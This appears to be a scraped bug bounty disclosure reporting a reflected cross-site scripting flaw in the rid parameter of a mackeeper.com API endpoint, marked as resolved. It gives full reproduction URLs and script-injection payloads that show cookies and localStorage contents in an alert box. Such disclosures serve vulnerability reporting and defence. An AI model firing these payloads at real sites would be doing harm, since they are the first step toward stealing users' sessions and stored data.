Loading HuntDB...

rxss at https://mackeeper.com page not found via rid parameter

Low
C
Clario
Submitted None

Team Summary

Official summary from Clario

### Summary Reflected xss at `/mk/api/send-event` with rid parameter. Vuln endpoint: `https://mackeeper.com/mk/api/send-event?rid=<PAYLOAD>` payload: `</script><script>alert(test)</script>` ### Steps To Reproduce go to `https://mackeeper.com/mk/api/send-event?rid=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E payload: </script><script>alert(document.cookie))</script>` go to `https://mackeeper.com/mk/api/send-event?rid=%3C/script%3E%3Cscript%3Ealert(JSON.stringify(localStorage))%3C/script%3E payload : </script><script>alert(JSON.stringify(localStorage))</script>`

Reported by g0dzira

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Submitted

Weakness

Cross-site Scripting (XSS) - Reflected